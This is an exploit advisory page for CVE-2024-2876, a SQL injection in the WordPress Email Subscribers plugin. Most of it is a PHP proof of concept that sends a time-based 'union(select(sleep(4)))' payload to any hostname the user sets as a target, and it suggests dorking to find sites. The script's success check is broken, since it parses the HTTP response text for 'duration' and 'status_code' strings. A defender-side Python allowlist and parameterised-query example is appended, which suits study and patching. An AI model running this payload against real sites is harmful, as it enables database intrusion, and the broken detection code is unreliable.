WordPress Email Subscribers 5.7.14 SQL Injection

02 Mar 2026 00:00:00 / Reported by indoushka / Type: packetstorm / Source: packetstorm.news

The WordPress Email Subscribers plugin is vulnerable to SQL injection (CVE-2024-2876).

=============================================================================================================================================
| # Title     : WordPress Email Subscribers 5.7.14 SQL Injection vulnerability                                                              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : Windows 10 Fr(Pro) / browser : Mozilla Firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://wordpress.org/plugins/email-subscribers/                                                                            |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engines.

[+] Code Description: The Email Subscribers – Email Marketing, Newsletters, Automation for WordPress and WooCommerce plugin for WordPress is vulnerable to SQL Injection

    (Related : https://packetstorm.news/files/id/188767/ Related CVE numbers: CVE-2024-2876 ) .

[+] Payload :

[+] Set Target : line 52.

[+] Usage : php poc.php

[+] PayLoad :

<?php
// CVE-2024-2876: SQL Injection Wordpress
// Author: indoushka


// Function to perform the SQL Injection test using cURL
function test_sql_injection($hostname) {
    $url = "http://{$hostname}/wp-admin/admin-post.php";
    $postFields = "page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111";

    $headers = [
        "Host: {$hostname}",
        "Content-Type: application/x-www-form-urlencoded",
    ];

    // Initialize cURL session
    $ch = curl_init();

    // Set cURL options
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 20); // Timeout set to 20 seconds

    // Execute cURL and get the response
    $response = curl_exec($ch);

    // Check if cURL request was successful
    if(curl_errno($ch)) {
        echo "cURL Error: " . curl_error($ch);
    } else {
        // Check for response characteristics (DSL conditions)
        $duration = substr($response, strpos($response, "duration") + 9, 4); // Adjust as needed based on response structure
        $status_code = substr($response, strpos($response, "status_code") + 12, 3); // Adjust as needed
        $header = substr($response, strpos($response, "header") + 7, 100); // Adjust based on actual response

        // Conditions matching (duration, status_code, header content)
        if ($duration >= 4 && $status_code == 200 && strpos($header, "application/json") !== false) {
            echo "SQL Injection vulnerability found!\n";
        } else {
            echo "No vulnerability detected.\n";
        }
    }

    // Close cURL session
    curl_close($ch);
}

// Example usage (Replace {{Hostname}} with the target hostname)
$hostname = 'example.com';  // Change this to your target
test_sql_injection($hostname);
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
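The PoC above works because the `field` key of `advanced_filter[conditions]` ends up inside the SQL text where only a column name belongs. The following Python is an added defender-side example, not part of the advisory or of the plugin's code: it parses the same form keys the PoC posts, checks `field` and `operator` against a hypothetical allowlist (the real column set is not on the page), and keeps `value` separate as a bind parameter, which is both the fix for this class of bug and a rule a WAF or audit-log review can apply to such requests.

```python
# Constructed example (not the plugin's code): allowlist the advanced_filter keys.
import re
from urllib.parse import parse_qsl

# Identifiers cannot be bound as SQL parameters, so a fixed (here hypothetical)
# allowlist is the only safe source for column names and operators.
ALLOWED_FIELDS = {"status", "list_id", "email", "created_at"}
ALLOWED_OPERATORS = {"=", "!=", ">", "<"}
KEY_RE = re.compile(
    r"^advanced_filter\[conditions\]\[(\d+)\]\[(\d+)\]\[(field|operator|value)\]$")

# Constructed sample bodies: a legitimate filter and the PoC's own payload.
BENIGN_BODY = ("page=es_subscribers&is_ajax=1&action=_sent"
               "&advanced_filter[conditions][0][0][field]=status"
               "&advanced_filter[conditions][0][0][operator]=="
               "&advanced_filter[conditions][0][0][value]=1")
POC_BODY = ("page=es_subscribers&is_ajax=1&action=_sent"
            "&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+"
            "&advanced_filter[conditions][0][0][operator]=="
            "&advanced_filter[conditions][0][0][value]=1111")

def parse_conditions(body: str) -> dict:
    """Group flat form keys into {(i, j): {"field": .., "operator": .., "value": ..}}."""
    conditions = {}
    for key, val in parse_qsl(body, keep_blank_values=True):
        m = KEY_RE.match(key)
        if m:
            i, j, part = m.groups()
            conditions.setdefault((int(i), int(j)), {})[part] = val
    return conditions

def check_conditions(body: str) -> list:
    """Detection view: list every field/operator off the allowlist (empty list = clean)."""
    findings = []
    for (i, j), cond in sorted(parse_conditions(body).items()):
        for part, allowed in (("field", ALLOWED_FIELDS), ("operator", ALLOWED_OPERATORS)):
            if cond.get(part) not in allowed:
                findings.append(f"conditions[{i}][{j}].{part} rejected: {cond.get(part)!r}")
    return findings

def build_where(body: str) -> tuple:
    """Mitigation view: identifiers from the allowlist only, values returned as bind params."""
    findings = check_conditions(body)
    if findings:
        raise ValueError("; ".join(findings))
    clauses, params = [], []
    for _, cond in sorted(parse_conditions(body).items()):
        clauses.append(f"`{cond['field']}` {cond['operator']} %s")
        params.append(cond.get("value", ""))
    return " AND ".join(clauses), params
```

Run against the PoC body, `check_conditions` reports the `field` value carrying the `union(select(sleep(4)))` text and `build_where` refuses to produce SQL for it; the `%s` placeholders in the returned clause are the same style `$wpdb->prepare()` expects.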


02 Mar 2026 00:00 (current)
Vulners AI Score: 6 (Medium risk)
CVSS 3.1: 9.8
EPSS: 0.80596